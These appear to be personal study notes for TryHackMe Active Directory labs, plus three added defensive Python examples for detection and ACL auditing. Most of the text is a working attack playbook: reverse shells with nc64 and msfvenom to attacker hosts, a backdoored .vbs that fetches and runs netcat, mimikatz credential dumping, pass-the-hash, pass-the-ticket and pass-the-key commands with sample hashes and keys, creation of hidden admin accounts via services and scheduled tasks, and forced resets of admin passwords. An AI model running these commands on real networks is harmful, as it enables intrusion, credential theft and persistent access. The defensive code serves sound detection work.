`runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe kali-vpn-ip kali-tcp-port"`
/netonly - use the credentials for network sessions only, all other commands run in the current user session on the local host
An attacker could then use the network session to enumerate SYSVOL on the domain controller, since even low level users can read it
SYSVOL: a network folder on a domain controller which is accessible by any authenticated AD account and stores GPO information
FQDN: It represents a specific and complete address, such as host.example.com.
Subdomain: It's a prefix added to the main domain, creating variations like subdomain.example.com.
Enumerating though Command Prompt
`net user /domain` Run on a domain-joined host to enumerate domain users
`net user user.name /domain` Run on a domain-joined host to get information about a specific domain user
`net group /domain` Run on a domain-joined host to enumerate domain groups
`net group groupName /domain` Run on a domain-joined host to get the members of a domain group
`net accounts /domain` Run on a domain-joined host to show the domain password and account lockout policy
!!! net does not show nested groups
!!! net only shows up to 10 groups even if a user is in more
Enumeration through PowerShell
`Get-ADUser -Filter *` return all domain users
`Get-ADUser -Filter 'Name -like "*stevens"'` find any user where name ends in ...stevens
`Get-ADUser -Identity john.doe -Properties *` find the user john.doe and return all properties
`Get-ADGroup -Filter *` return all domain groups
`Get-ADGroup -Identity Administrators | Get-ADGroupMember` pipe the Administrators group object to Get-ADGroupMember to retrieve members of the group
Get any domain objects that we modified on or after a specific date and time
`$modifiedDate = Get-Date '2022/02/28'` `Get-ADObject -Filter "whenChanged -ge $modifiedDate" -IncludeDeletedObjects`
Change a User Password
`$oldPass = Read-Host -AsSecureString -Prompt 'Enter the old password'`
`$newPass = Read-Host -AsSecureString -Prompt 'Enter the new password'`
`Set-ADAccountPassword -Identity user.name -OldPassword $oldpPass -NewPassword $newPass`
0xBEN: PowerShell AD Module on Any Domain Host as Any User
https://notes.benheater.com/books/active-directory/page/powershell-ad-module-on-any-domain-host-as-any-user?ref=benheater.com
Normally, one must install RSAT (Remote Server Administration Tools) on a host to make remote calls to Active Directory from a client computer.
And, one must normally be an administrative user to import the PowerShell Active Directory module.
The trick here is borrowing the Microsoft.ActiveDirectory.Management.dll from a domain-joined host with RSAT installed.
Getting the DLL
`Get-WindowsCapability -Name RSAT*ActiveDirectory* -Online | Add-WindowsCapability -Online`
Finding the DLL
`gci -Path 'C:\Windows' -Recurse -Filter 'Microsoft.ActiveDirectory.Management.dll' -EA SilentlyContinue | ? {$_.FullName -like '*GAC_64*' -or $_.FullName -like '*amd64*'} | select -Expand FullName`
Import to PowerShell
Import-Module 'C:\Path\to\file.dll'
Using the Module
Get-Command -Module Microsoft.ActiveDirectory.Management
Bloodhound
https://github.com/BloodHoundAD/SharpHound/releases/download/v1.1.0/SharpHound-v1.1.0.zip
`Invoke-WebRequest http://kali-vpn-ip/SharpHound-v1.1.0.zip -OutFile SharpHound-v1.1`
`Expand-Archive SharpHound-v1.1.0.zip ; cd SharpHound-v1.1.0`
`.\SharpHound.exe --CollectionMethods All --Domain za.tryhackme.com --ExcludeDCs`
`scp username@za.tryhackme.com@thmjmp1.za.tryhackme.com:C:/Users/username/Documents/SharpHound-v1.1.0/20220805005305_BloodHound.zip .`
`neo4j console & ; bloodhound &` import zip and start analize
Additional Enumeration Techniques
=====LdapDomainDump https://notes.benheater.com/books/active-directory/page/ldapdomaindump
nmap found: '389/tcp ldap' '636/tcp ldapssl' '3268/tcp globalcatLDAP' '3269/tcp globalcatLDAPssl'
`ldapdomaindump -u 'domain.tld\username' -p password -o /tmp/ldap_stuff dc-ip-address`
`proxychains -q ldapdomaindump -u 'domain.tld\username' -p password -o /tmp/ldap_stuff dc-ip-address`
=====PowerView.ps1 https://powersploit.readthedocs.io/en/latest/Recon/ https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview
=====WMI https://0xinfection.github.io/posts/wmi-ad-enum/
WMI stands for Windows Management Instrumentation, and it's a powerful framework within the Windows operating system that provides access to a vast range of system information, settings, and management functionalities.
list out the available classes
`Get-WmiObject -Namespace root\directory\ldap -Class ds_* -List`
Finding the domain name
`Get-WmiObject -Namespace root\directory\ldap -Class ds_domain | select ds_dc, ds_distinguishedname, pscomputername`
Getting the domain policy
`Get-WmiObject -Namespace root\directory\ldap -Class ds_domain | select ds_lockoutduration, ds_lockoutobservationwindow, ds_lockoutthreshold, ds_maxpwdage, ds_minpwdage, ds_minpwdlength, ds_pwdhistorylength, ds_pwdproperties`
Finding the domain controller (userAccountControl 532480 = 0x82000 = SERVER_TRUST_ACCOUNT 0x2000 + TRUSTED_FOR_DELEGATION 0x80000)
`Get-WmiObject -Namespace root\directory\ldap -Class ds_computer | where { $_.ds_useraccountcontrol -match 532480 } | select ds_cn, ds_dnshostname, ds_operatingsystem, ds_lastlogon, ds_pwdlastset`
Searching user accounts
`Get-WmiObject -Class win32_useraccount | select name, domain, accounttype`
Filter out just the user accounts for a single domain
`Get-WmiObject -Class win32_useraccount -Filter 'domain="infected"' | select caption`
Enumerating currently logged-on users
`Get-WmiObject -Class win32_loggedonuser | where { $_ -match 'infected' } | foreach {[wmi]$_.antecedent}`
Fetching groups
`Get-WmiObject -Class win32_groupindomain | foreach {[wmi]$_.partcomponent}`
Figuring out group memberships
`Get-WmiObject -Class win32_groupuser | where { $_.groupcomponent -match 'domain admins' } | foreach {[wmi]$_.partcomponent}`
`Get-WmiObject -Class win32_groupuser | where { $_.groupcomponent -match 'Administrator' } | foreach {[wmi]$_.partcomponent}`
Finding machines in the domain
`Get-WmiObject -Namespace root\directory\ldap -Class ds_computer | select ds_cn`
Enumerating admin privileges across AD
`$pcs = Get-WmiObject -Namespace root\directory\ldap -Class ds_computer | select -ExpandProperty ds_cn
foreach ($pc in $pcs) { (Get-WmiObject -Class win32_computersystem -ComputerName $pc -ErrorAction silentlycontinue).name }`
https://benheater.com/tryhackme-lateral-movement-pivoting/
`openvpn --config ./lateralmovementandpivoting.ovpn --daemon`
edit /etc/resolv.conf: add 'search za.tryhackme.com' and 'nameserver 10.200.54.101' above any existing nameserver line
`systemctl restart networking.service`
test DNS `ping za.tryhackme.com` `nslookup thmdc.za.tryhackme.com`
http://distributor.za.tryhackme.com/creds
`ssh username@za.tryhackme.com@thmjmp2.za.tryhackme.com`
The built-in default administrator account is not subject to UAC, while other local administrator accounts are.
Remote Sessions
=====PsExec TCP/445 Requires the account to be an administrator
`.\psexec.exe \\target-ip -u username -p password -i cmd.exe`
Workflow: Upload psexesvc.exe via the ADMIN$ share, create and start the PSEXESVC service, communicate over the named pipe `\\.\pipe\psexesvc`
=====WinRM HTTP:TCP/5985 OR HTTPS:TCP/5986
`$username = 'user.name'`
`$password = 'mypass' | ConvertTo-SecureString -AsPlainText -Force`
`$credential = [pscredential]::new($username, $password)`
`Invoke-Command -ComputerName target-ip -Credential $credential -ScriptBlock {Get-Command}`
`$session = New-PSSession -ComputerName target-ip -Credential $credential`
`$session | Enter-PSSession` `$session | Remove-PSSession`
=====sc.exe RCE by registering and running services on a host. The service is configured to run a command at start up.
`sc.exe \\target-ip create FakeService binpath= "net user adm1n p@ssword123! /add" start= auto`
`sc.exe \\target-ip start FakeService`
`sc.exe \\target-ip stop FakeService` `sc.exe \\target-ip delete FakeService`
Workflow: Try to authenticate to the Service Control Manager via RPC first. If RPC fails, attempt to communicate via a SMB named pipe.
=====schtasks: Remote command/payload execution by registering a scheduled task on a host.
`schtasks /s target-ip /RU "SYSTEM" /create /tn "MyTask" /tr "powershell -command 'Get-ComputerInfo'" /sc ONCE /sd 01/01/1970 /st 00:00`
`schtasks /s target-ip /run /tn "MyTask"`
`schtasks /s target-ip /tn "MyTask" /DELETE /F`
Moving Laterally Using WMI
Connecting to WMI from PowerShell
Requirements_1: Target Ports: RPC - TCP/135 + TCP/49152-65535 Or WinRM_HTTP:TCP/5985 WinRM_HTTPS:TCP/5986
Requirements_2: user.name has Administrators Group Memberships
Create a Credential Object for Authentication
`$username = 'user.name' ; $password = 'password' | ConvertTo-SecureString -AsPlainText -Force`
`$credential = [pscredential]::new($username, $password)`
Create a CIM Session for Repeated Use
`$server = 'target-ip / fqdn' ; $sessionopt = New-CimSessionOption -Protocol DCOM`
`$session = New-CimSession -ComputerName $server -Credential $credential -SessionOption $sessionopt -ErrorAction Stop`
Run a Command Remotely
`$kaliVpnIP = 'kali-vpn-ip' ; $kaliPort = 443`
`$command = "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command `"[Net.Sockets.TcpClient]::new().ConnectAsync('$kaliVpnIP', $kaliPort)`""`
note: the backtick before each inner double quote escapes it inside the outer PowerShell string
`$parameters = @{ CimSession = $session;ClassName = 'Win32_Process';MethodName = 'Create';Arguments = @{CommandLine = $command} }`
`Invoke-CimMethod @parameters`
Creating Services Remotely
Create the Service
`$parameters = @{CimSession = $session;ClassName = 'Win32_Service';MethodName = 'Create'; Arguments = @{Name = 'l337service';DisplayName = 'l337service';PathName = 'net user adm1n password123 /ADD';ServiceType = [byte]16;StartMode = 'Manual'} }`
`Invoke-CimMethod @parameters`
Discover the Service and Start it
`$svc = Get-CimInstance -CimSession $session -ClassName Win32_Service -Filter "Name LIKE 'l337service'"`
`$svc | Invoke-CimMethod -MethodName StartService`
Modify the Service and Re-Run It
`$svc | Invoke-CimMethod -MethodName Change -Arguments @{PathName = 'net localgroup Administrators adm1n /ADD'}`
`$svc | Invoke-CimMethod -MethodName StartService`
Clean up the Service
`$svc | Invoke-CimMethod -MethodName StopService`
`$svc | Invoke-CimMethod -MethodName Delete`
Create Scheduled Tasks Remotely
Define a Task Action
# Same as running cmd.exe /c net user adm1n password123 /ADD
# Adds a local user adm1n with password password123
`$command = 'cmd.exe'`
`$arguments = '/c net user adm1n password123 /ADD'`
`$parameters = @{CimSession = $session;Execute = $command;Argument = $arguments}`
`$action = New-ScheduledTaskAction @parameters`
Create and Start the Task
`$parameters = @{CimSession = $session;Action = $action;User = 'NT AUTHORITY\SYSTEM';TaskName = 'l337task'}`
`$task = Register-ScheduledTask @parameters`
`$task | Start-ScheduledTask`
Update and Delete the Task
`$arguments = '/c net user adm1n password123 /ADD'`
`$parameters = @{CimSession = $session;Execute = $command;Argument = $arguments}`
`$action = New-ScheduledTaskAction @parameters`
`$task = Set-ScheduledTask -CimSession $session -TaskName l337task -Action $action`
`$task | Start-ScheduledTask`
`$task | Unregister-ScheduledTask`
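The sc.exe, schtasks and WMI sections above all leave a footprint in the Windows event log. As an added defensive counterpart (example code written for this page, not taken from the room or from the notes linked above), the following Python triages constructed event records for the three primitives: System 7045 for a service whose ImagePath is a command line, Security 4698 for a scheduled task whose action is a command interpreter, and Security 4688 for a process spawned by WmiPrvSE.exe, which is what Win32_Process.Create produces. The field names follow the Windows event schema; the sample records and the list of interpreter names in LOLBIN_RE are constructed assumptions you would tune to your environment.

```python
import re
import xml.etree.ElementTree as ET

# Command interpreters / LOLBins. A genuine service ImagePath or task action starts a
# program; "cmd.exe /c ...", "net user ..." or "powershell -Command ..." in that slot
# means the primitive is being used to run a one-liner. (Assumed list; tune it.)
LOLBIN_RE = re.compile(
    r'(?:^|[\\\s"])(cmd|powershell|pwsh|net|net1|rundll32|mshta|wscript|cscript)'
    r'(?:\.exe)?(?=[\s"]|$)',
    re.IGNORECASE,
)
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def check_service_install(ev):
    """System 7045 'A service was installed in the system'. sc.exe create ...
    binpath= "net user ..." lands here with the command line in ImagePath."""
    path = ev.get("ImagePath", "")
    if LOLBIN_RE.search(path):
        return f"7045 service {ev['ServiceName']!r} installed with a command as ImagePath: {path}"
    return None


def check_task_created(ev):
    """Security 4698 'A scheduled task was created' (needs 'Other Object Access Events'
    auditing). TaskContent carries the task XML: the action and the principal it runs as."""
    root = ET.fromstring(ev["TaskContent"])
    cmd = root.findtext(".//t:Exec/t:Command", default="", namespaces=TASK_NS)
    args = root.findtext(".//t:Exec/t:Arguments", default="", namespaces=TASK_NS)
    runs_as = root.findtext(".//t:Principal/t:UserId", default="caller", namespaces=TASK_NS)
    if LOLBIN_RE.search(cmd):
        return f"4698 task {ev['TaskName']!r} runs as {runs_as}: {cmd} {args}".rstrip()
    return None


def check_process_created(ev):
    """Security 4688 'A new process has been created' (with command-line auditing on).
    Win32_Process.Create over DCOM/WinRM makes the new process a child of WmiPrvSE.exe,
    something an interactive user never produces."""
    parent = ev.get("ParentProcessName", "").rsplit("\\", 1)[-1].lower()
    child = ev.get("NewProcessName", "")
    if parent == "wmiprvse.exe" and LOLBIN_RE.search(child):
        return f"4688 WmiPrvSE.exe spawned {child}: {ev.get('CommandLine', '')}"
    return None


CHECKS = {7045: check_service_install, 4698: check_task_created, 4688: check_process_created}


def triage(events):
    """One alert string per suspicious record, in input order."""
    alerts = []
    for ev in events:
        check = CHECKS.get(ev["EventID"])
        hit = check(ev) if check else None
        if hit:
            alerts.append(hit)
    return alerts


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "WinDefend",
     "ImagePath": r'"C:\Program Files\Windows Defender\MsMpEng.exe"'},
    {"EventID": 7045, "ServiceName": "FakeService",
     "ImagePath": "net user adm1n p@ssword123! /add"},
    {"EventID": 4698, "TaskName": r"\l337task", "TaskContent": (
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        '<Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>'
        '<Actions Context="Author"><Exec><Command>cmd.exe</Command>'
        "<Arguments>/c net user adm1n password123 /ADD</Arguments></Exec></Actions></Task>")},
    {"EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command ..."},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

The two benign records (a real service binary and a cmd.exe started from Explorer) pass; the other three fire. Note that 4698 and the command line in 4688 are not collected by default and have to be switched on in the audit policy before these checks see anything.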
Install MSI Packages
Create a MSI Payload
`msfvenom -p windows/x64/shell_reverse_tcp LHOST=kali-vpn-ip LPORT=443 -f msi -o l337pkg.msi`
`smbclient //thmiis.za.tryhackme.com/ADMIN$ -U 'za.tryhackme.com/t1_corine.waters%Korine.1994' -c 'put l337pkg.msi' --option="client min protocol=core"`
`nc -lnvp 443`
Install the MSI Payload
`$username = 't1_corine.waters';$pw = 'Korine.1994' | ConvertTo-SecureString -AsPlainText -Force`
`$credential = [pscredential]::new($username, $pw);$sessionopt = New-CimSessionOption -Protocol DCOM`
`$parameters = @{ComputerName = 'thmiis.za.tryhackme.com';Credential = $credential;SessionOption = $sessionopt;ErrorAction = 'Stop';}`
`$session = New-CimSession @parameters`
`$parameters = @{CimSession = $session;ClassName = 'Win32_Product';MethodName = 'Install';Arguments = @{PackageLocation = 'C:\Windows\l337pkg.msi';Options = $null;AllUsers = $false} }`
`Invoke-CimMethod @parameters`
Use of Alternate Authentication Material
Rubeus: https://github.com/GhostPack/Rubeus#asreproast
mimikatz_manual_1: https://adsecurity.org/?page_id=1821
mimikatz_manual_2: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md
=====NTLM Authentication|Pass-the-Hash
Dump NTLM Hashes
`privilege::debug` `sekurlsa::msv`
Pass-the-Hash with Mimikatz
`token::revert`
`sekurlsa::pth /user:t1_toby.beck /domain:za.tryhackme.com /ntlm:533f1bd576caa912bdb9da284bbc60fe /run:"C:\tools\nc64.exe -e cmd.exe kali-vpn-ip 443"`
Pass-the-Hash from Kali
`impacket-wmiexec -hashes ':533f1bd576caa912bdb9da284bbc60fe' 'za.tryhackme.com/t1_toby.beck@thmiis.za.tryhackme.com'`
https://notes.benheater.com/books/active-directory/page/mimikatz
https://notes.benheater.com/books/active-directory/page/dumping-hashes-without-mimikatz
=====Kerberos Authentication|Pass-the-Ticket|Pass-the-Key|Overpass-the-Hash
Dump Kerberos Tickets
`sekurlsa::tickets /export`
file_example: `[0;97d82]-2-0-40e10000-t2_felicia.dean@krbtgt-ZA.TRYHACKME.COM.kirbi`
[0;97d82]: LUID of the logon session the ticket came from (0x3e7 is SYSTEM)
-2-: ticket group (0 = TGS, 1 = client ticket, 2 = TGT)
0-40e10000: index of the ticket within that group, then the Kerberos ticket flags 0x40e10000 (forwardable, renewable, initial, pre_authent, name_canonicalize, as klist shows them)
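The export file name packs the logon session, ticket group and ticket flags into a fixed pattern, so a responder who finds a directory of .kirbi files on a host can read off which sessions lost a TGT without opening the tickets. The following Python is an added example written for this page (not mimikatz's own code): it parses the name into its fields and decodes the flags word with the names klist prints. The pattern is assumed from the example above and the flag table is RFC 4120 bit order with bit 0 as the most significant bit; the sample file names other than the page's own are constructed.

```python
import re

# Kerberos ticket flags, named as Windows klist prints them (bit 0 of the RFC 4120
# bit string is the MSB, so "forwardable" = bit 1 = 0x40000000). RFC 6806 calls the
# 0x00010000 bit enc-pa-rep; klist labels it name_canonicalize.
TICKET_FLAGS = {
    0x40000000: "forwardable",
    0x20000000: "forwarded",
    0x10000000: "proxiable",
    0x08000000: "proxy",
    0x04000000: "may_postdate",
    0x02000000: "postdated",
    0x01000000: "invalid",
    0x00800000: "renewable",
    0x00400000: "initial",
    0x00200000: "pre_authent",
    0x00100000: "hw_authent",
    0x00080000: "transited_policy_checked",
    0x00040000: "ok_as_delegate",
    0x00010000: "name_canonicalize",
}
GROUPS = {0: "TGS", 1: "client ticket", 2: "TGT"}

# [luid_hi;luid_lo]-group-index-flags-client@service-target.kirbi  (assumed layout)
KIRBI_RE = re.compile(
    r"^\[(?P<luid_hi>[0-9a-f]+);(?P<luid_lo>[0-9a-f]+)\]-(?P<group>[0-2])-(?P<index>\d+)-"
    r"(?P<flags>[0-9a-f]{8})-(?P<client>[^@]+)@(?P<service>[^-]+)-(?P<target>.+)\.kirbi$",
    re.IGNORECASE,
)


def decode_flags(flags):
    """Flag names set in a ticket flags word, most significant bit first."""
    return [name for bit, name in sorted(TICKET_FLAGS.items(), reverse=True) if flags & bit]


def parse_kirbi_name(filename):
    """Split a mimikatz ticket export name into its fields and decode the flags."""
    m = KIRBI_RE.match(filename)
    if not m:
        raise ValueError(f"not a mimikatz ticket export name: {filename}")
    flags = int(m["flags"], 16)
    luid = (int(m["luid_hi"], 16) << 32) | int(m["luid_lo"], 16)
    return {
        "luid": luid,  # logon session the ticket was taken from (0x3e7 = SYSTEM)
        "group": GROUPS[int(m["group"])],
        "index": int(m["index"]),
        "flags": flags,
        "flag_names": decode_flags(flags),
        "client": m["client"],
        "service": m["service"],
        "target": m["target"],
        "is_tgt": m["service"].lower() == "krbtgt",
    }


def triage_exports(filenames):
    """Summarise a set of exports: which logon sessions lost a TGT, and which service
    tickets carry ok_as_delegate, i.e. point at a host trusted for unconstrained
    delegation. Those are the two facts a responder wants first."""
    tgt_sessions, delegation_targets = set(), set()
    for name in filenames:
        t = parse_kirbi_name(name)
        if t["is_tgt"]:
            tgt_sessions.add((t["luid"], t["client"]))
        elif "ok_as_delegate" in t["flag_names"]:
            delegation_targets.add(f"{t['service']}/{t['target']}")
    return tgt_sessions, delegation_targets


# Constructed sample export names (the first one is the page's own example).
SAMPLE_EXPORTS = [
    "[0;97d82]-2-0-40e10000-t2_felicia.dean@krbtgt-ZA.TRYHACKME.COM.kirbi",
    "[0;97d82]-0-1-40a50000-t2_felicia.dean@cifs-THMSERVER1.za.tryhackme.com.kirbi",
    "[0;3e7]-0-0-40a10000-THMJMP2$@ldap-thmdc.za.tryhackme.com.kirbi",
]

if __name__ == "__main__":
    for name in SAMPLE_EXPORTS:
        print(parse_kirbi_name(name))
    print(triage_exports(SAMPLE_EXPORTS))
```

A TGT export (group 2, service krbtgt) means the whole logon session is reusable via Pass-the-Ticket until it expires or is renewed, so the account behind that LUID is the first to reset. Service tickets with ok_as_delegate are worth listing separately because the KDC only sets that bit for targets with TRUSTED_FOR_DELEGATION, which is the unconstrained-delegation exposure covered later on this page.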
Pass-the-Ticket with Mimikatz
`kerberos::ptt [0;ca99f8]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi`
exit mimikatz and check `klist`
get a shell with the ticket `winrs.exe -r:thmiis.za.tryhackme.com cmd.exe`
Pass-the-Ticket from Kali
`impacket-ticketConverter \[0\;ca99f8\]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi t1_toby.beck.ccache`
`export KRB5CCNAME=t1_toby.beck.ccache`
`impacket-wmiexec za.tryhackme.com/t1_toby.beck@thmiis.za.tryhackme.com -k -no-pass`
Dump Kerberos Encryption Keys
`sekurlsa::ekeys`
Pass-the-Key with Mimikatz
`token::revert`
`sekurlsa::pth /user:t1_toby.beck /domain:za.tryhackme.com /aes256:6a0d48f79acaec013d928d84a102b72028d574340b6139e876e179db48fbde4e /run:"C:\tools\nc64.exe -e cmd.exe kali-vpn-ip 443"`
Pass-the-Key from Kali
`impacket-getTGT 'za.tryhackme.com/t1_toby.beck' -aesKey 6a0d48f79acaec013d928d84a102b72028d574340b6139e876e179db48fbde4e`
`export KRB5CCNAME=t1_toby.beck.ccache`
`impacket-wmiexec 'za.tryhackme.com/t1_toby.beck@thmiis.za.tryhackme.com' -k -no-pass`
Abusing User Behavior
Backdooring .vbs Scripts
`CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\FILE-SERVER-IP\share_name\nc64.exe %tmp% & %tmp%\nc64.exe -e cmd.exe attacker-ip-address 80", 0, True`
Backdooring .exe Files
`msfvenom -a x64 --platform windows -x /tmp/filename.exe -k -p windows/x64/shell_reverse_tcp LHOST=kali-ip-address LPORT=80 -b '\x00' -f exe -o filename.exe`
RDP Session Hijacking
On Windows Server 2016 and older, if a user opens an RDP session to a host and that session is disconnected (not logged off), the session stays logged in until the server is rebooted.
The attacker does not need to know the password that was used when the original RDP session was created.
On Windows Server 2019 and newer, the attacker must know the password used to create the RDP session.
NT AUTHORITY\SYSTEM> query user
output columns: USERNAME SESSIONNAME ID STATE IDLE_TIME LOGON_TIME
NT AUTHORITY\SYSTEM> tscon ID /dest:SESSIONNAME
NT AUTHORITY\SYSTEM> tscon 3 /dest:rdp-tcp#5
Port Forwarding
https://notes.benheater.com/books/network-pivoting
The room content only covers chisel, but I note all of them.
plink https://documentation.help/PuTTY/plink-usage.html
chisel https://github.com/jpillora/chisel
sshuttle https://github.com/sshuttle/sshuttle
squid https://www.tecmint.com/install-squid-in-ubuntu/
ssh https://notes.benheater.com/books/network-pivoting/page/penetrating-networks-via-ssh-jumphosts
setup proxychains https://trojand.com/cheatsheet/Network/Connections/SSH_Tunneling.html#dynamic-port-forwarding-with-proxychains
The only proxy tool I need is ligolo-ng:
ligolo-ng https://github.com/nicocha30/ligolo-ng
https://systemweakness.com/everything-about-pivoting-oscp-active-directory-lateral-movement-6ed34faa08a2
https://benheater.com/tryhackme-exploiting-active-directory
`openvpn --config ./exploitingad.ovpn --daemon`
edit /etc/resolv.conf: add 'search za.tryhackme.com' and 'nameserver 10.200.60.101' above any existing nameserver line
`systemctl restart networking.service`
test DNS `ping za.tryhackme.com` `nslookup thmdc.za.tryhackme.com`
http://distributor.za.tryhackme.com/creds
Exploiting Permission Delegation
=====Exploiting ACEs: Access Control Entries (ACEs) populate Discretionary Access Control Lists (DACLs). These ACLs determine the permissions that certain AD objects have over others.
ForceChangePassword : Set a user's password without knowing their current password.
AddMembers : Add users (including oneself), groups, or computers to a target group.
GenericAll : Complete control over an object, including the ability to change the user's password, register an SPN or add an AD object to the target group.
GenericWrite : Update any non-protected parameters of our target object. For example, could update the scriptPath parameter, which would set a user's logon script.
WriteOwner : Update the owner of the target object. Could make ourselves the owner, allowing us to gain additional permissions over the object.
WriteDACL : We have the ability to write new ACEs to the target object's DACL. For example, could write an ACE that grants our account full control over the target object.
AllExtendedRights : Perform any action associated with extended AD rights against the target object. For example, the ability to force change a user's password.
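Each name on the list above is a label BloodHound attaches to a raw ACE once it has looked at the access mask and the object-type GUID the ACE is scoped to. The following Python is an added example written for this page (not BloodHound's or SharpHound's code) that performs that mapping and then lists every edge held by a principal outside an assumed administrative baseline, which is how a defender audits for the misconfigurations the next section exploits. The ActiveDirectoryRights bit values and the two schema GUIDs (User-Force-Change-Password, member attribute) are the standard ones; the ACLs, the IT Support RID and the baseline of expected admins are constructed assumptions.

```python
from dataclasses import dataclass

# ActiveDirectoryRights / ADS_RIGHTS_ENUM bits that matter for the edges above
GENERIC_ALL    = 0x10000000
GENERIC_WRITE  = 0x40000000
WRITE_OWNER    = 0x00080000
WRITE_DACL     = 0x00040000
CONTROL_ACCESS = 0x00000100   # shown as "ExtendedRight"
WRITE_PROPERTY = 0x00000020

# ObjectType GUIDs of the two scoped rights on the list
GUID_FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"  # User-Force-Change-Password
GUID_MEMBER_ATTRIBUTE      = "bf9679c0-0de6-11d0-a285-00aa003049e2"  # 'member' attribute
NULL_GUID = "00000000-0000-0000-0000-000000000000"                    # ACE covers the whole object


@dataclass
class Ace:
    trustee_sid: str
    mask: int
    object_type: str = NULL_GUID
    allow: bool = True


def classify_ace(ace):
    """Edge names (as on the list above) that one ACE grants its trustee. An ACE scoped
    to a single attribute or extended right only counts for that attribute or right."""
    if not ace.allow:
        return []
    obj = ace.object_type.lower()
    if obj == NULL_GUID:
        if ace.mask & GENERIC_ALL:
            return ["GenericAll"]
        edges = []
        if ace.mask & (GENERIC_WRITE | WRITE_PROPERTY):
            edges.append("GenericWrite")
        if ace.mask & WRITE_DACL:
            edges.append("WriteDACL")
        if ace.mask & WRITE_OWNER:
            edges.append("WriteOwner")
        if ace.mask & CONTROL_ACCESS:
            edges.append("AllExtendedRights")
        return edges
    edges = []
    if ace.mask & (GENERIC_ALL | CONTROL_ACCESS) and obj == GUID_FORCE_CHANGE_PASSWORD:
        edges.append("ForceChangePassword")
    if ace.mask & (GENERIC_ALL | WRITE_PROPERTY) and obj == GUID_MEMBER_ATTRIBUTE:
        edges.append("AddMembers")
    return edges


def expected_admin(sid, domain_sid):
    """Principals expected to hold full control: SYSTEM, BUILTIN\\Administrators,
    Domain Admins (RID 512), Enterprise Admins (RID 519). Assumed baseline; extend it."""
    return sid in {"S-1-5-18", "S-1-5-32-544", f"{domain_sid}-512", f"{domain_sid}-519"}


def risky_edges(target, acl, domain_sid):
    """(trustee, edge, target) for every right held by a trustee outside the baseline."""
    return [
        (ace.trustee_sid, edge, target)
        for ace in acl
        if not expected_admin(ace.trustee_sid, domain_sid)
        for edge in classify_ace(ace)
    ]


# Constructed sample mirroring the BloodHound findings in the next section
# (the domain SID is the one quoted later on this page; the IT Support RID is made up).
DOMAIN_SID = "S-1-5-21-3885271727-2693558621-2658995185"
SID_DOMAIN_USERS = f"{DOMAIN_SID}-513"
SID_IT_SUPPORT = f"{DOMAIN_SID}-1105"
READ_ONLY = 0x00020094   # ReadControl | ListObject | ReadProperty | ListChildren

ACL_IT_SUPPORT = [
    Ace(f"{DOMAIN_SID}-512", GENERIC_ALL),     # Domain Admins: expected
    Ace("S-1-5-18", GENERIC_ALL),              # SYSTEM: expected
    Ace(SID_DOMAIN_USERS, GENERIC_WRITE),      # the misconfiguration
]
ACL_T2_ADMIN = [
    Ace(SID_DOMAIN_USERS, READ_ONLY),          # harmless read access
    Ace(SID_IT_SUPPORT, CONTROL_ACCESS, GUID_FORCE_CHANGE_PASSWORD),
]

if __name__ == "__main__":
    for finding in (risky_edges("IT Support", ACL_IT_SUPPORT, DOMAIN_SID)
                    + risky_edges("t2_admin", ACL_T2_ADMIN, DOMAIN_SID)):
        print(finding)
```

On a live domain the Ace records come from the DACL of each object (Get-Acl on the AD: drive or an LDAP read of nTSecurityDescriptor); the classification logic stays the same. Every finding this prints is one edge BloodHound would draw from a non-admin principal, and the fix is to remove the ACE or move the trustee into a tiered admin group.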
=====Inspecting Bloodhound Data
Our user account is in 'Domain Users' group, which has 'GenericWrite' over 'IT Support' group.
`$user = Get-ADUser -Identity 'user.name' ; $group = Get-ADGroup -Identity 'IT Support'`
`Add-ADGroupMember -Identity $group -Members $user ; Get-ADGroupMember -Identity $group`
'IT Support' group has 'ForceChangePassword' over the 'Tier 2 Administrators' group.
`$t2admin = Get-ADGroupMember -Identity 'Tier 2 Admins' | Get-Random -Count 1`
`$password = 'strong.pass1' | ConvertTo-SecureString -AsPlainText -Force`
`Set-ADAccountPassword -Identity $t2admin -Reset -NewPassword $password`
`xfreerdp /v:thmwrk1.za.tryhackme.loc /u:'t2.admin' /p:'strong.pass1'`
Exploiting Kerberos Delegation
General purpose of Kerberos delegation is to allow an application or service to access a resource on another machine on behalf of a user or machine.
If a user logs into an application, the application will request resources on other machines on behalf of the user.
This removes the need for a single, broadly privileged service account.
=====Unconstrained Delegation:
TRUSTED_FOR_DELEGATION
A host has no limit on the resources it can access on behalf of a user who connects, as long as the host's account has the TRUSTED_FOR_DELEGATION flag set. Once a user connects, the host obtains a TGT for the user and caches it locally for future use.
# Get the service account
`$serviceAccount = Get-ADUser -Identity "ServiceAccount"`
# Enable Unconstrained Delegation: sets TRUSTED_FOR_DELEGATION in userAccountControl
`Set-ADAccountControl -Identity $serviceAccount -TrustedForDelegation $true`
# Check whether Unconstrained Delegation is enabled
`Get-ADUser -Identity "ServiceAccount" -Properties TrustedForDelegation | Select-Object SamAccountName, TrustedForDelegation`
=====Constrained Delegation:
TRUSTED_TO_AUTH_FOR_DELEGATION
msDS-AllowedToDelegateTo
Restricts which services a service account can request tickets for on behalf of a user.
